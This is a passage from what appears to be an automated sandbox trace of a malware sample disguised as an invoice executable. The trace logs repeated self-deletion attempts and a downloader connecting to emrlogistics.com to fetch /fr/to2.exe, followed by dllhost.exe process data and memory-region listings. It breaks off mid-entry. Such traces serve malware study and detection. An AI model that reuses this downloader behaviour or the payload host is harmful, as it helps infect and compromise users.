"c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.792] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.792] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.792] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.793] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.793] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.793] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.793] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.793] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.793] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.793] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.793] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.793] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.793] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.794] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.794] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.794] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.794] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.794] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.794] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.794] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.794] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.794] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.794] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.794] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.795] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.795] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.795] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.795] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.795] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.795] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.795] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.795] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.795] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.795] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.796] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.796] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.796] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.796] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.796] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.796] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.796] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.796] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0126.796] DeleteFileW (lpFileName="C:\\DOCUME~1\\SUPERV~1\\LOCALS~1\\Temp\\Temporary Directory 1 for Invoice_OCT-02-2013.zip\\Invoice_OCT-02-2013.exe" (normalized: "c:\\docume~1\\superv~1\\locals~1\\temp\\temporary directory 1 for invoice_oct-02-2013.zip\\invoice_oct-02-2013.exe")) returned 0 [0127.209] InternetOpenW (lpszAgent="Updates downloader", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0127.327] InternetConnectW (hInternet=0xcc0004, lpszServerName="emrlogistics.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0127.328] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="/fr/to2.exe", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x19ff58*="text/*", dwFlags=0x80803000, dwContext=0x0) returned 0xcc000c [0127.329] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x19ff6c, lpdwBufferLength=0x19ff64 | out: lpBuffer=0x19ff6c, lpdwBufferLength=0x19ff64) returned 1 [0127.329] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x19ff6c*, dwBufferLength=0x4) returned 1 [0127.331] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0171.414] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0214.007] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0256.069] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0298.285] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0340.347] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) Thread: id = 9 os_tid = 0x13d8 Thread: id = 10 os_tid = 0x13a4 Thread: id = 11 os_tid = 0x139c Thread: id = 12 os_tid = 0x1128 Thread: id = 20 os_tid = 0x13fc Thread: id = 21 os_tid = 0x13f0 Thread: id = 22 os_tid = 0x13f4 Process: id = "3" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x2172a000" os_pid = "0x99c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x274" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ebd3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 475 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 476 start_va = 0xa8ce680000 end_va = 0xa8ce77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000a8ce680000" filename = "" Region: id = 477 start_va = 0xa8ce800000 end_va = 0xa8ce9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000a8ce800000" filename = "" Region: id = 478 start_va = 0xa8ceb00000 end_va = 0xa8cebfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000a8ceb00000" filename = "" Region: id = 479 start_va = 0xa8cee00000 end_va = 0xa8ceefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000a8cee00000" filename = "" Region: id = 480 start_va = 0xa8cf000000 end_va = 0xa8cf0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000a8cf000000" filename = "" Region: id = 481 start_va = 0xa8cf100000 end_va = 0xa8cf1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000a8cf100000" filename = "" Region: id = 482 start_va = 0xa8cf200000 end_va = 0xa8cf2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000a8cf200000" filename = "" Region: id = 483 start_va = 0xa8cf400000 end_va = 0xa8cf4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000a8cf400000" filename = "" Region: id = 484 start_va = 0x1cd529b0000 end_va = 0x1cd529bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd529b0000" filename = "" Region: id = 485 start_va = 0x1cd529c0000 end_va = 0x1cd529c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd529c0000" filename = "" Region: id = 486 start_va = 0x1cd529d0000 end_va = 0x1cd529e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd529d0000" filename = "" Region: id = 487 start_va = 0x1cd529f0000 end_va = 0x1cd529f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd529f0000" filename = "" Region: id = 488 start_va = 0x1cd52a00000 end_va = 0x1cd52a01fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd52a00000" filename = "" Region: id = 489 start_va = 0x1cd52a10000 end_va = 0x1cd52acdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 490 start_va = 0x1cd52ad0000 end_va = 0x1cd52ad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52ad0000" filename = "" Region: id = 491 start_va = 0x1cd52ae0000 end_va = 0x1cd52ae6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd52ae0000" filename = "" Region: id = 492 start_va = 0x1cd52af0000 end_va = 0x1cd52af0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52af0000" filename = "" Region: id = 493 start_va = 0x1cd52b00000 end_va = 0x1cd52b00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd52b00000" filename = "" Region: id = 494 start_va = 0x1cd52b10000 end_va = 0x1cd52b10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd52b10000" filename = "" Region: id = 495 start_va = 0x1cd52b20000 end_va = 0x1cd52b20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52b20000" filename = "" Region: id = 496 start_va = 0x1cd52b30000 end_va = 0x1cd52b30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd52b30000" filename = "" Region: id = 497 start_va = 0x1cd52b40000 end_va = 0x1cd52b40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd52b40000" filename = "" Region: id = 498 start_va = 0x1cd52b50000 end_va = 0x1cd52b5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52b50000" filename = "" Region: id = 499 start_va = 0x1cd52b60000 end_va = 0x1cd52b6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52b60000" filename = "" Region: id = 500 start_va = 0x1cd52b70000 end_va = 0x1cd52b7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52b70000" filename = "" Region: id = 501 start_va = 0x1cd52b80000 end_va = 0x1cd52b8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52b80000" filename = "" Region: id = 502 start_va = 0x1cd52b90000 end_va = 0x1cd52b9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52b90000" filename = "" Region: id = 503 start_va = 0x1cd52ba0000 end_va = 0x1cd52baffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52ba0000" filename = "" Region: id = 504 start_va = 0x1cd52bb0000 end_va = 0x1cd52bb7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd52bb0000" filename = "" Region: id = 505 start_va = 0x1cd52bc0000 end_va = 0x1cd52bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd52bc0000" filename = "" Region: id = 506 start_va = 0x1cd52bd0000 end_va = 0x1cd52bd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd52bd0000" filename = "" Region: id = 507 start_va = 0x1cd52be0000 end_va = 0x1cd52cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd52be0000" filename = "" Region: id = 508 start_va = 0x1cd52ce0000 end_va = 0x1cd52ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd52ce0000" filename = "" Region: id = 509 start_va = 0x1cd52de0000 end_va = 0x1cd52deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52de0000" filename = "" Region: id = 510 start_va = 0x1cd52df0000 end_va = 0x1cd52dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52df0000" filename = "" Region: id = 511 start_va = 0x1cd52e00000 end_va = 0x1cd52e0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52e00000" filename = "" Region: id = 512 start_va = 0x1cd52e10000 end_va = 0x1cd52e1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52e10000" filename = "" Region: id = 513 start_va = 0x1cd52e20000 end_va = 0x1cd52e2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52e20000" filename = "" Region: id = 514 start_va = 0x1cd52e30000 end_va = 0x1cd52e3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52e30000" filename = "" Region: id = 515 start_va = 0x1cd52e40000 end_va = 0x1cd52e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd52e40000" filename = "" Region: id = 516 start_va = 0x1cd52e50000 end_va = 0x1cd52e53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd52e50000" filename = "" Region: id = 517 start_va = 0x1cd52e60000 end_va = 0x1cd52e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd52e60000" filename = "" Region: id = 518 start_va = 0x1cd52e70000 end_va = 0x1cd52ff7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd52e70000" filename = "" Region: id = 519 start_va = 0x1cd53000000 end_va = 0x1cd53180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd53000000" filename = "" Region: id = 520 start_va = 0x1cd53190000 end_va = 0x1cd5458ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001cd53190000" filename = "" Region: id = 521 start_va = 0x1cd54590000 end_va = 0x1cd548c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 522 start_va = 0x1cd548d0000 end_va = 0x1cd558cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd548d0000" filename = "" Region: id = 523 start_va = 0x1cd558d0000 end_va = 0x1cd558d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd558d0000" filename = "" Region: id = 524 start_va = 0x1cd558e0000 end_va = 0x1cd558e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd558e0000" filename = "" Region: id = 525 start_va = 0x1cd558f0000 end_va = 0x1cd5597ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd558f0000" filename = "" Region: id = 526 start_va = 0x1cd55980000 end_va = 0x1cd55987fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55980000" filename = "" Region: id = 527 start_va = 0x1cd55990000 end_va = 0x1cd55991fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd55990000" filename = "" Region: id = 528 start_va = 0x1cd559a0000 end_va = 0x1cd55a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001cd559a0000" filename = "" Region: id = 529 start_va = 0x1cd55aa0000 end_va = 0x1cd55aaffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 530 start_va = 0x1cd55ab0000 end_va = 0x1cd55abffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 531 start_va = 0x1cd55ac0000 end_va = 0x1cd55acffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 532 start_va = 0x1cd55ad0000 end_va = 0x1cd55adffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 533 start_va = 0x1cd55af0000 end_va = 0x1cd55afffff monitored = 1 entry_point = 0x0 region_type = 